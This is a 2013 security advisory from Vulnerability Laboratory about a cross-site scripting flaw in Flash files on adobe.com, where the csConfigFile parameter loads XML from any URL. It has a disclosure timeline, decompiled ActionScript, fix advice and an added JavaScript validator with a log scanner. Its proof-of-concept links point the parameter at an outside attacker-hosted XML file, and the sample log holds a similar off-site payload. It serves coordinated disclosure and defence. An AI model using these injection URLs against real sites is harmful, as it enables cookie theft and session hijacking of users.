Document Title:
===============
Adobe - CS Flash Cross Site Vulnerability & Filter Bypass
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1022
Release Date:
=============
2013-09-25
Vulnerability Laboratory ID (VL-ID):
====================================
1022
Common Vulnerability Scoring System:
====================================
2.1
Product & Service Introduction:
===============================
Adobe Systems, Inc. is an American multinational computer software company headquartered in San Jose, California,
United States. The company has historically focused upon the creation of multimedia and creativity software
products, with a more-recent foray towards rich Internet application software development.
Adobe was founded in December 1982 by John Warnock and Charles Geschke, who established the company after leaving
Xerox PARC in order to develop and sell the PostScript page description language. In 1985, Apple Computer licensed
PostScript for use in its LaserWriter printers, which helped spark the desktop publishing revolution. The company
name Adobe comes from Adobe Creek in Los Altos, California, which ran behind the houses of both of the company's
founders. Adobe acquired its former competitor, Macromedia, in December 2005, which added newer software products
and platforms such as ColdFusion, Dreamweaver, Flash and Flex to its product portfolio.
As of 2010, Adobe Systems has 9,117 employees, about 40% of whom work in San Jose. Adobe also has major development
operations in Orlando; Seattle; San Francisco; Lehi, Utah; Minneapolis; Waltham, Massachusetts; and San Luis Obispo,
California in the United States; Ottawa, Canada; Hamburg, Germany; Noida and Bangalore, India; Bucharest, Romania;
Basel, Switzerland; and Beijing, China.
(Copy of the vendor Homepage: http://www.adobe.com)
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a remote client-side vulnerability in a Flash component hosted on the official Adobe Systems website.
Vulnerability Disclosure Timeline:
==================================
2013-07-17: Researcher Notification & Coordination (Ateeq Khan)
2013-07-18: Vendor Notification (Adobe - Security Team)
2013-08-13: Vendor Response/Feedback (Adobe Security Team)
2013-09-24: Vendor Fix/Patch (Adobe Developer Team)
2013-09-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Adobe Systems
Product: Online Service - Web Application 2013 Q2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Low
Technical Details & Description:
================================
A Vulnerability Laboratory researcher discovered a flaw in a Flash component that is live on the main website of
Adobe Systems (www.adobe.com). The affected component loads its XML configuration file from a caller-supplied URL
without validating it, so a remote attacker can make it include an .xml file from an external, non-validated website,
resulting in HTML injection and cross-site scripting (XSS). The injected script is non-persistent and executes on the
client side. At least two .swf files have been identified that carry the vulnerable code.
Depending on the victim's Flash Player version, the reported issue manifests as cross-site scripting or as cross-site
request forgery. In Flash Player 8 and below, using an uninitialized (globally undefined) variable in any function
that makes a web request results in a cross-site scripting vulnerability. In Flash Player 9 and above, Adobe partially
mitigated this behaviour, and what remains is a cross-site request forgery vulnerability: the SWF can still be made
to issue an unauthorized request to a sensitive resource on the user's behalf.
The affected path is `/enterprise/partners/sap_tour/Misc/` and the affected parameter is `csConfigFile`.
Normally the component loads `config.xml` from its own directory on the same host. Because the `csConfigFile=`
parameter is not validated, it can be set via the GET request (as a FlashVar) to the URL of a remote malicious .xml
file of the attacker's choice. Once that file is loaded, the attacker's client-side script executes inside the frame of
the Flash web application.
If the user's Flash Player is version 8 or below, the result is exploitable cross-site scripting. A successful
cross-site scripting attack can be used to manipulate or steal cookies, create requests that are mistaken for those
of a valid user, compromise confidential information, or execute malicious code in the end user's browser.
The recommended mitigation is to initialize every global variable in the Flash application; if FlashVars must be
accepted as input, validate them properly before use.
Vulnerable Path:
[+] http://www.adobe.com/enterprise/partners/sap_tour/Misc/
Vulnerable File(s):
[+] Improving_Customer_Service_controller.swf
[+] Customer_Cummunications_Management_controller.swf
Vulnerable Parameter(s):
[+] csConfigFile
Proof of Concept (PoC):
=======================
The client-side cross-site scripting vulnerability can be exploited by a remote attacker without authentication and
with low or medium user interaction. For demonstration or to reproduce the issue, open the following links ...
POC Link #1:
http://www.adobe.com/enterprise/partners/sap_tour/Misc/Customer_Cummunications_Management_controller.swf?csConfigFile=http://www.evolution-sec.com/clients/flashjs/test.xml
POC Link #2:
http://www.adobe.com/enterprise/partners/sap_tour/Misc/Improving_Customer_Service_controller.swf?csConfigFile=http://www.evolution-sec.com/clients/flashjs/test.xml
Review: Source Code (decompiled ActionScript 2 from the affected controller .swf)
MovieClip 0 {
    // Frame 0
    // Action0
    {
        loadConfigFile = function () {
            ConfigData = new XML();
            ConfigData.onLoad = configFileLoaded;
            ConfigData.ignoreWhite = true;
            // csConfigFile is a FlashVar: if the embedding HTML or the query string does not set it,
            // fall back to the local config.xml next to the SWF
            if (_root.csConfigFile == undefined) {
                _root.csConfigFile = "config.xml";
            }
            // No validation of _root.csConfigFile before the load: whatever URL the caller supplied
            // (including a remote attacker-controlled .xml file) is fetched and parsed
            var __callResult_34 = ConfigData.load(_root.csConfigFile);
            CSData = new Object();
        };
    }
}
Solution - Fix & Patch:
=======================
Set restrictive allowScriptAccess and allowNetworking parameters in the HTML that embeds the SWF. Validate every
variable that is passed to a URL-loading function: allow only the http:// and https:// schemes, and either check
that the URL points to an allowed domain or accept only relative paths. Escape special characters before placing
untrusted data in HTML text fields, and do not use HTML text fields unless HTML rendering is actually needed.
Compile the SWF for a recent Flash Player version and encourage users to run the latest Flash Player.
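The validation described in the solution and in the technical details, written out as an added example (this is not Adobe's code and not part of the original advisory): a JavaScript check that resolves a csConfigFile value the way the SWF would (relative to the SWF's own URL) and accepts it only for http/https, only for an allowed host, only inside the SWF's own directory and only for an .xml document, followed by the same check run over constructed web-server log lines to flag requests that carried an off-site csConfigFile. The host allow-list, the client addresses and the log lines are assumptions constructed for the example; the paths and file names come from the advisory. Run it with Node.js.

```javascript
// Added example, not code from the advisory or from Adobe. Implements the advisory's fix advice
// (http/https only, allowed host or relative path only) and applies it to constructed access-log lines.

const ALLOWED_HOSTS = new Set(['www.adobe.com']);   // assumption: hosts the SWF may fetch its XML from

// Resolve a csConfigFile value relative to the SWF's URL and return the absolute URL the SWF may
// load, or null if the value must be rejected.
function resolveConfigUrl(value, swfUrl) {
  if (typeof value !== 'string' || value.trim() === '') return null;
  let url;
  try {
    url = new URL(value, swfUrl);            // "config.xml" -> same directory as the SWF
  } catch (e) {
    return null;                             // unparseable input is rejected, not repaired
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null; // javascript:, data:, file:, ftp:
  if (url.username !== '' || url.password !== '') return null;           // http://www.adobe.com@evil.example/
  if (!ALLOWED_HOSTS.has(url.hostname.toLowerCase())) return null;       // off-site host, incl. //evil.example/x.xml
  const swfDir = new URL('.', swfUrl).pathname;                          // directory the SWF lives in
  if (!url.pathname.startsWith(swfDir)) return null;                     // ../ is normalised away by the parser
  if (!url.pathname.toLowerCase().endsWith('.xml')) return null;         // only XML config documents
  return url.href;
}

// Scan access-log lines and return the client addresses of requests whose csConfigFile
// would have been rejected by resolveConfigUrl (i.e. likely exploitation attempts).
function findConfigFileAbuse(logLines, siteOrigin) {
  const hits = [];
  for (const line of logLines) {
    const m = line.match(/^(\S+) .*"(?:GET|POST) (\S+) HTTP\/[\d.]+"/);
    if (!m) continue;                                   // not a request line we understand
    const requested = new URL(m[2], siteOrigin);
    const value = requested.searchParams.get('csConfigFile');
    if (value === null) continue;                       // parameter absent: nothing to evaluate
    const swfUrl = requested.origin + requested.pathname;
    if (resolveConfigUrl(value, swfUrl) === null) hits.push(m[1]);
  }
  return hits;
}

// Constructed sample log lines (not real Adobe logs). The first has the shape of the advisory's PoC link,
// the last uses a protocol-relative URL to reach an off-site host.
const SAMPLE_LOG = [
  '203.0.113.7 - - [25/Sep/2013:10:00:00 +0000] "GET /enterprise/partners/sap_tour/Misc/Customer_Cummunications_Management_controller.swf?csConfigFile=http://www.evolution-sec.com/clients/flashjs/test.xml HTTP/1.1" 200 5120',
  '198.51.100.9 - - [25/Sep/2013:10:00:05 +0000] "GET /enterprise/partners/sap_tour/Misc/Improving_Customer_Service_controller.swf?csConfigFile=config.xml HTTP/1.1" 200 5120',
  '198.51.100.10 - - [25/Sep/2013:10:00:09 +0000] "GET /enterprise/partners/sap_tour/Misc/Improving_Customer_Service_controller.swf HTTP/1.1" 200 5120',
  '203.0.113.8 - - [25/Sep/2013:10:01:00 +0000] "GET /enterprise/partners/sap_tour/Misc/Improving_Customer_Service_controller.swf?csConfigFile=//evil.example/x.xml HTTP/1.1" 200 5120',
];

console.log(findConfigFileAbuse(SAMPLE_LOG, 'http://www.adobe.com'));
```

In the SWF itself the same rules belong in ActionScript immediately before `ConfigData.load(_root.csConfigFile)`; the log scan only detects attempts after the fact, since a client can always craft the query string. The allowScriptAccess and allowNetworking embed parameters are a separate control that limits what a loaded SWF may do, not a substitute for validating the URL.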
Security Risk:
==============
The security risk of the client-side cross-site scripting vulnerability is estimated as medium(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq Khan ([email protected]) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: [email protected] - [email protected] - [email protected]
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]